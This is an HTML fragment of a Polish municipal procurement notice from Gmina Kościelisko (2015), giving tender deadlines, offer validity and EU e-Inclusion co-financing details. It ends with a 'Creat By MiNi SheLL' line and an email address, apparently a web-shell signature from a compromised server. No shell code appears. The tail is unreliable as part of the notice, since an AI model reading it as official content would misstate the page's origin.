<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koscielisko.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościelisko ul. Strzelców Podhalańskich 44 34-511 Kościelisko pok. nr 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2015 godzina 10:00, miejsce: Urząd Gminy Kościelisko ul. Strzelców Podhalańskich 44 34-511 Kościelisko pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka 8 Oś Priorytetowa: Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki , Działanie 8.3 Przeciwdziałanie wykluczeniu - elnclusion..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com